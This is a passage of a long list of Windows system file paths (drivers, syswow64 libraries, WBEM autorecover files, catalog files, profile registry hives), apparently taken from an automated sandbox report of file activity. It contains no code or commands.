- <SYSTEM32>\wbem\autorecover\0268b349fb528f7a876a79de14717b95.mof
- <SYSTEM32>\wbem\autorecover\0296c47314ab746ec35476488248fcd9.mof
- <SYSTEM32>\wbem\autorecover\050628afd4663f70e87d9d92fa3613ac.mof
- <SYSTEM32>\wbem\autorecover\0685dc0c8684127be5deff585fdd8fec.mof
- <SYSTEM32>\wbem\autorecover\070646108bd2e03a20d78b04d8233ff3.mof
- <SYSTEM32>\wbem\autorecover\0772ea28c9ad9f026aa9f29ee684b717.mof
- <DRIVERS>\en-us\wdf01000.sys.mui
- <DRIVERS>\en-us\ws2ifsl.sys.mui
- <SYSTEM32>\config\system.log
- %WINDIR%\syswow64\adaptertroubleshooter.exe
- <SYSTEM32>\wbem\autorecover\077bf13372a893e23655462663ebeea4.mof
- %WINDIR%\syswow64\admparse.dll
- %WINDIR%\syswow64\admtmpl.dll
- %WINDIR%\syswow64\adprovider.dll
- %WINDIR%\syswow64\adsldp.dll
- %WINDIR%\syswow64\adsldpc.dll
- %WINDIR%\syswow64\adsmsext.dll
- %WINDIR%\syswow64\adsnt.dll
- %WINDIR%\syswow64\adtschema.dll
- <SYSTEM32>\wbem\autorecover\088f2bf65584eea866644bc7f977eff8.mof
- %WINDIR%\syswow64\advancedinstallers\cmiadapter.dll
- <SYSTEM32>\wbem\autorecover\08c1b7796fa905a26e5374a6a473922b.mof
- %WINDIR%\syswow64\advancedinstallers\cmiv2.dll
- %WINDIR%\syswow64\advancedinstallers\oemhelpins.dll
- %WINDIR%\syswow64\advapi32.dll
- <SYSTEM32>\api-ms-win-core-processthreads-l1-1-1.dll
- <SYSTEM32>\api-ms-win-core-profile-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-rtlsupport-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-string-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-synch-l1-1-0.dll
- %WINDIR%\syswow64\advpack.dll
- <SYSTEM32>\api-ms-win-core-synch-l1-2-0.dll
- <SYSTEM32>\api-ms-win-core-sysinfo-l1-1-0.dll
- %WINDIR%\syswow64\aecache.dll
- %WINDIR%\syswow64\aeevts.dll
- %WINDIR%\syswow64\alttab.dll
- <SYSTEM32>\wbem\autorecover\092389d621f5a8834203daac74cca279.mof
- %WINDIR%\syswow64\amcompat.tlb
- <DRIVERS>\errdev.sys
- %WINDIR%\syswow64\amstream.dll
- %WINDIR%\syswow64\amxread.dll
- <SYSTEM32>\config\systemprofile\ntuser.dat
- <SYSTEM32>\wbem\autorecover\0a08f32a1fa8136fd5ebd89c0fbdc310.mof
- <DRIVERS>\etc\hosts
- <DRIVERS>\etc\lmhosts.sam
- <DRIVERS>\etc\networks
- %WINDIR%\syswow64\apds.dll
- <DRIVERS>\etc\protocol
- <SYSTEM32>\wbem\autorecover\0a737f96d2ca73d85ffbe7a15651275c.mof
- <DRIVERS>\etc\services
- <SYSTEM32>\config\systemprofile\ntuser.dat.log
- <SYSTEM32>\config\systemprofile\ntuser.dat.log1
- <DRIVERS>\evbda.sys
- <DRIVERS>\exfat.sys
- <SYSTEM32>\config\systemprofile\ntuser.dat.log2
- <SYSTEM32>\config\systemprofile\ntuser.dat{d5e30002-f518-11df-a5c1-806e6f6e6963}.tm.blf
- %WINDIR%\syswow64\api-ms-win-core-console-l1-1-0.dll
- <SYSTEM32>\wbem\autorecover\0a9dbc92d554324656f61f9862679f27.mof
- <DRIVERS>\fastfat.sys
- <SYSTEM32>\config\systemprofile\ntuser.dat{d5e30002-f518-11df-a5c1-806e6f6e6963}.tmcontainer00000000000000000001.regtrans-ms
- %WINDIR%\syswow64\api-ms-win-core-datetime-l1-1-0.dll
- <DRIVERS>\fdc.sys
- %WINDIR%\syswow64\api-ms-win-core-debug-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-delayload-l1-1-0.dll
- <DRIVERS>\fileinfo.sys
- %WINDIR%\syswow64\api-ms-win-core-errorhandling-l1-1-0.dll
- <DRIVERS>\filetrace.sys
- <DRIVERS>\flpydisk.sys
- <DRIVERS>\fltmgr.sys
- %WINDIR%\syswow64\api-ms-win-core-fibers-l1-1-0.dll
- <DRIVERS>\fsdepends.sys
- %WINDIR%\syswow64\api-ms-win-core-file-l1-1-0.dll
- <DRIVERS>\fs_rec.sys
- <DRIVERS>\fvevol.sys
- <SYSTEM32>\config\systemprofile\ntuser.dat{d5e30002-f518-11df-a5c1-806e6f6e6963}.tmcontainer00000000000000000002.regtrans-ms
- <DRIVERS>\fwpkclnt.sys
- <SYSTEM32>\api-ms-win-core-threadpool-l1-1-0.dll
- <DRIVERS>\gagp30kx.sys
- <DRIVERS>\gm.dls
- <DRIVERS>\gmreadme.txt
- <SYSTEM32>\wbem\autorecover\0af2d09c9745e5fa1ec76370242d29c9.mof
- <DRIVERS>\hcw85cir.sys
- <DRIVERS>\hdaudbus.sys
- <DRIVERS>\hdaudio.sys
- <DRIVERS>\hidbatt.sys
- <DRIVERS>\hidbth.sys
- <DRIVERS>\hidclass.sys
- <DRIVERS>\hidir.sys
- <DRIVERS>\hidparse.sys
- <DRIVERS>\hidusb.sys
- <DRIVERS>\hpsamd.sys
- <SYSTEM32>\wbem\autorecover\0b112a908deb3d8e94d7eae47e58eed4.mof
- <DRIVERS>\http.sys
- <DRIVERS>\hwpolicy.sys
- %WINDIR%\syswow64\api-ms-win-core-file-l1-2-0.dll
- <DRIVERS>\i8042prt.sys
- <DRIVERS>\iastorv.sys
- <DRIVERS>\iirsp.sys
- <DRIVERS>\intelide.sys
- <DRIVERS>\intelppm.sys
- %WINDIR%\syswow64\api-ms-win-core-file-l2-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-handle-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-heap-l1-1-0.dll
- <SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\windows\ietldcache\index.dat
- <SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\windows\cookies\index.dat
- <SYSTEM32>\wbem\autorecover\0b611d21d3ee110113d8328a297fbbd8.mof
- %WINDIR%\syswow64\api-ms-win-core-interlocked-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-io-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-libraryloader-l1-1-0.dll
- <SYSTEM32>\wbem\autorecover\0cb20bbe6d0c85467ea8094b62eb29f8.mof
- %WINDIR%\syswow64\api-ms-win-core-localization-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-localization-l1-2-0.dll
- <SYSTEM32>\wbem\autorecover\0dd514b208bd4ac9b4133d667d93e9c1.mof
- %WINDIR%\syswow64\api-ms-win-core-localregistry-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-timezone-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-memory-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-ums-l1-1-0.dll
- <SYSTEM32>\wbem\autorecover\0eb27d08bbd19cb63981bd22fb7cb1d7.mof
- <SYSTEM32>\api-ms-win-core-util-l1-1-0.dll
- <DRIVERS>\ipfltdrv.sys
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\desktop.ini
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\content.ie5\desktop.ini
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\content.ie5\index.dat
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\content.ie5\wbv8e33v\desktop.ini
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\content.ie5\sce8xht8\desktop.ini
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\content.ie5\nnk3ar0p\desktop.ini
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\<INETFILES>\content.ie5\hq2zdjqm\desktop.ini
- <SYSTEM32>\wbem\autorecover\10304bfa9c4ba594f276fcbd1b47b3f4.mof
- <SYSTEM32>\wbem\autorecover\117c0ae87ab58218cb3d0c2c3074734e.mof
- <SYSTEM32>\wbem\autorecover\11d43b5fdaa6379107366bf049a15a1f.mof
- <SYSTEM32>\wbem\autorecover\137dcca16cf7fef0bd593790227387c3.mof
- <SYSTEM32>\api-ms-win-core-xstate-l1-1-0.dll
- <SYSTEM32>\wbem\autorecover\14c5a2a3c41254184b007011e5565e5b.mof
- <SYSTEM32>\wbem\autorecover\14cd238acdcf64feffb0cbd55e8e7adc.mof
- <DRIVERS>\ipmidrv.sys
- <DRIVERS>\ipnat.sys
- %WINDIR%\syswow64\api-ms-win-core-misc-l1-1-0.dll
- <DRIVERS>\irda.sys
- <SYSTEM32>\api-ms-win-core-xstate-l2-1-0.dll
- %WINDIR%\cm.exe
- %WINDIR%\ta.exe
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\history\desktop.ini
- <SYSTEM32>\wbem\autorecover\164e6651d6fa43297a43fba68399eb35.mof
- %WINDIR%\syswow64\api-ms-win-core-namedpipe-l1-1-0.dll
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\portable devices\wpdlog00.sqm
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\history\history.ie5\desktop.ini
- <SYSTEM32>\wbem\autorecover\16bf74354380af165e9b086f1772f43b.mof
- %WINDIR%\syswow64\api-ms-win-core-processenvironment-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-processthreads-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-processthreads-l1-1-1.dll
- <DRIVERS>\irenum.sys
- <DRIVERS>\isapnp.sys
- <SYSTEM32>\api-ms-win-crt-conio-l1-1-0.dll
- <SYSTEM32>\wbem\autorecover\16fad33e010431e04187a275bc9d6f95.mof
- %WINDIR%\syswow64\api-ms-win-core-profile-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-rtlsupport-l1-1-0.dll
- <DRIVERS>\kbdclass.sys
- <DRIVERS>\kbdhid.sys
- <DRIVERS>\ks.sys
- <DRIVERS>\ksecdd.sys
- <DRIVERS>\ksecpkg.sys
- <DRIVERS>\ksthunk.sys
- <DRIVERS>\lltdio.sys
- <DRIVERS>\lsi_fc.sys
- <SYSTEM32>\api-ms-win-crt-convert-l1-1-0.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <DRIVERS>\lsi_sas.sys
- <DRIVERS>\lsi_sas2.sys
- <DRIVERS>\lsi_scsi.sys
- <DRIVERS>\luafv.sys
- <DRIVERS>\mcd.sys
- <SYSTEM32>\api-ms-win-crt-environment-l1-1-0.dll
- <DRIVERS>\megasas.sys
- <DRIVERS>\megasr.sys
- <SYSTEM32>\api-ms-win-crt-filesystem-l1-1-0.dll
- <DRIVERS>\modem.sys
- <DRIVERS>\monitor.sys
- <DRIVERS>\mouclass.sys
- <DRIVERS>\mouhid.sys
- <DRIVERS>\mountmgr.sys
- <DRIVERS>\mpio.sys
- <DRIVERS>\mpsdrv.sys
- <DRIVERS>\mrxdav.sys
- <DRIVERS>\mrxsmb.sys
- <DRIVERS>\mrxsmb10.sys
- <DRIVERS>\mrxsmb20.sys
- <DRIVERS>\msahci.sys
- <DRIVERS>\msdsm.sys
- <DRIVERS>\msfs.sys
- <DRIVERS>\msftwdf_kernel_01009_inbox_critical.wdf
- <SYSTEM32>\api-ms-win-crt-heap-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-locale-l1-1-0.dll
- <DRIVERS>\msft_user_wpdfs_01_09_00.wdf
- <DRIVERS>\mshidkmdf.sys
- <DRIVERS>\msisadrv.sys
- <DRIVERS>\msiscsi.sys
- <DRIVERS>\mskssrv.sys
- <DRIVERS>\mspclock.sys
- <DRIVERS>\mspqm.sys
- <DRIVERS>\msrpc.sys
- <DRIVERS>\mssmbios.sys
- <DRIVERS>\mstee.sys
- <DRIVERS>\mtconfig.sys
- <SYSTEM32>\api-ms-win-crt-math-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-multibyte-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-private-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-process-l1-1-0.dll
- <DRIVERS>\mup.sys
- <SYSTEM32>\api-ms-win-crt-runtime-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-stdio-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-string-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-time-l1-1-0.dll
- %WINDIR%\syswow64\api-ms-win-core-string-l1-1-0.dll
- <SYSTEM32>\api-ms-win-crt-utility-l1-1-0.dll
- <SYSTEM32>\api-ms-win-eventing-provider-l1-1-0.dll
- <SYSTEM32>\api-ms-win-security-base-l1-1-0.dll
- <SYSTEM32>\api-ms-win-security-lsalookup-l1-1-0.dll
- <SYSTEM32>\api-ms-win-security-sddl-l1-1-0.dll
- <SYSTEM32>\wbem\autorecover\170582a367212aefc42024970663a3cf.mof
- <SYSTEM32>\api-ms-win-service-core-l1-1-0.dll
- <SYSTEM32>\api-ms-win-service-management-l1-1-0.dll
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\history\history.ie5\index.dat
- <SYSTEM32>\api-ms-win-service-management-l2-1-0.dll
- <SYSTEM32>\api-ms-win-service-winsvc-l1-1-0.dll
- <SYSTEM32>\apilogen.dll
- <SYSTEM32>\apircl.dll
- <SYSTEM32>\apisetschema.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\apphelp.dll
- <SYSTEM32>\wbem\autorecover\171aa9c4a12329acb44b44e5ccf413b2.mof
- <DRIVERS>\ndis.sys
- <DRIVERS>\ndiscap.sys
- <DRIVERS>\ndistapi.sys
- <DRIVERS>\ndisuio.sys
- <DRIVERS>\ndiswan.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <DRIVERS>\ndproxy.sys
- <DRIVERS>\netbios.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <DRIVERS>\netbt.sys
- <DRIVERS>\netio.sys
- <SYSTEM32>\apphlpdm.dll
- <SYSTEM32>\wbem\autorecover\17739268451fa293127233c63e6490e4.mof
- <DRIVERS>\nfrd960.sys
- <DRIVERS>\npfs.sys
- <DRIVERS>\nsiproxy.sys
- <DRIVERS>\ntfs.sys
- <DRIVERS>\null.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <DRIVERS>\nvraid.sys
- <DRIVERS>\nvstor.sys
- <DRIVERS>\nv_agp.sys
- <DRIVERS>\nwifi.sys
- <DRIVERS>\ohci1394.sys
- <DRIVERS>\pacer.sys
- <SYSTEM32>\wbem\autorecover\17ffdf80330024b07853138cb5afad9c.mof
- <SYSTEM32>\appidapi.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\wbem\autorecover\1828fc7b28c7f3c41564a5f697f7ca03.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <DRIVERS>\parport.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\wbem\autorecover\183bbb685a92ee39350b5341e76e1a36.mof
- <SYSTEM32>\appidcertstorecheck.exe
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <DRIVERS>\partmgr.sys
- <DRIVERS>\pci.sys
- <DRIVERS>\pciide.sys
- <DRIVERS>\pciidex.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Enterprise-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <DRIVERS>\pcmcia.sys
- <SYSTEM32>\wbem\autorecover\18e18e1fb83a42e38ffdd638481afd76.mof
- <DRIVERS>\pcw.sys
- <DRIVERS>\peauth.sys
- <DRIVERS>\portcls.sys
- <DRIVERS>\processr.sys
- <DRIVERS>\ql2300.sys
- <DRIVERS>\ql40xx.sys
- <DRIVERS>\qwavedrv.sys
- <DRIVERS>\rasacd.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Enterprise-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <DRIVERS>\rasl2tp.sys
- <SYSTEM32>\wbem\autorecover\193658e8cfd1b6da63900293a08ab3b3.mof
- <DRIVERS>\raspppoe.sys
- <SYSTEM32>\arp.exe
- <SYSTEM32>\asferror.dll
- <SYSTEM32>\aspnet_counters.dll
- <SYSTEM32>\asycfilt.dll
- <SYSTEM32>\at.exe
- <SYSTEM32>\atbroker.exe
- <SYSTEM32>\atl.dll
- <SYSTEM32>\atl100.dll
- <SYSTEM32>\atl110.dll
- <SYSTEM32>\atmfd.dll
- <SYSTEM32>\atmlib.dll
- <SYSTEM32>\attrib.exe
- <SYSTEM32>\audiodg.exe
- <SYSTEM32>\audioeng.dll
- <SYSTEM32>\audiokse.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Enterprise-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\196d85f545d04a07fab59a215759550b.mof
- <SYSTEM32>\audioses.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Enterprise-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\wbem\autorecover\1a03dcc99ac5d3b9db66d554be25e80c.mof
- <DRIVERS>\raspptp.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomeBasic-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <DRIVERS>\rassstp.sys
- <DRIVERS>\rdbss.sys
- <DRIVERS>\rdpbus.sys
- <DRIVERS>\rdpcdd.sys
- <DRIVERS>\rdpdr.sys
- <DRIVERS>\rdpencdd.sys
- <DRIVERS>\rdprefmp.sys
- <DRIVERS>\rdpvideominiport.sys
- <DRIVERS>\rdpwd.sys
- <DRIVERS>\rdyboost.sys
- <DRIVERS>\rmcast.sys
- <DRIVERS>\rndismp.sys
- <SYSTEM32>\audiosrv.dll
- <SYSTEM32>\wbem\autorecover\1a738c13b86df72cb8baed7dbb609395.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomeBasic-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <DRIVERS>\rootmdm.sys
- <SYSTEM32>\auditcse.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomeBasic-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomeBasic-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <DRIVERS>\rspndr.sys
- <DRIVERS>\sbp2port.sys
- <DRIVERS>\scfilter.sys
- <DRIVERS>\scsiport.sys
- <SYSTEM32>\wbem\autorecover\1ad3f424d5232a20bc5e66a81b7b97ec.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomePremium-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\auditnativesnapin.dll
- <SYSTEM32>\wbem\autorecover\1b30a1ad0e1bde02c2e09c29dfa9bc35.mof
- <SYSTEM32>\wbem\autorecover\1ba88acb624e02a260404a9d8f7bd8e5.mof
- <DRIVERS>\secdrv.sys
- <SYSTEM32>\wbem\autorecover\1bb26712a2d9e6e80dfe5848666b4e46.mof
- <SYSTEM32>\wbem\autorecover\1cb59e1e5e670d392b494cccb28de2ae.mof
- <SYSTEM32>\wbem\autorecover\1cbdcf937cd71e7d0d800c58c0253b47.mof
- <SYSTEM32>\wbem\autorecover\1d128a1a48b3eb3ce5658f89ac0e0c3a.mof
- <SYSTEM32>\wbem\autorecover\1d56cd0610b69ea00dcf734d7a8a443f.mof
- <SYSTEM32>\wbem\autorecover\1d5a967d13ba8d1814d2928af5075c4f.mof
- <SYSTEM32>\wbem\autorecover\1d6fed7ad26e5d960976fe55304d24cc.mof
- <SYSTEM32>\wbem\autorecover\1e97a05de566cf6eeae29d0634e27392.mof
- <SYSTEM32>\wbem\autorecover\1ebe968eb7af815a32641e6185350a9e.mof
- <SYSTEM32>\wbem\autorecover\1ecbf762b303b65bd458a30a4019de60.mof
- <SYSTEM32>\wbem\autorecover\1f0f4d945e3b547596376c4fc118ffd1.mof
- <SYSTEM32>\wbem\autorecover\1fe37632c650068b357b2667a920fdb7.mof
- <SYSTEM32>\wbem\autorecover\20133bc3ffa56bbcd6a1356879d9b41e.mof
- <SYSTEM32>\wbem\autorecover\20d6bb97427c88edb58e4856c5986125.mof
- <SYSTEM32>\wbem\autorecover\211b29c8c1d76dcceaf1595a0192318f.mof
- <SYSTEM32>\wbem\autorecover\22bd4e705855faece7ffab23c49d3662.mof
- <SYSTEM32>\wbem\autorecover\23382a14dcf5dc3293f7b727cc26462c.mof
- <SYSTEM32>\wbem\autorecover\23f080032c67dbc43cd2d6613e6602f2.mof
- <SYSTEM32>\wbem\autorecover\2472aac9b63617a43cd9826389f60c18.mof
- <SYSTEM32>\wbem\autorecover\24b7c65e0bd6e7ee3fb16c28ba47d28c.mof
- <DRIVERS>\serenum.sys
- <DRIVERS>\serial.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomePremium-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\wbem\autorecover\24e5e9c11b55b772a50f129b525f5551.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomePremium-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-HomePremium-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Starter-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Starter-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Starter-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Starter-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
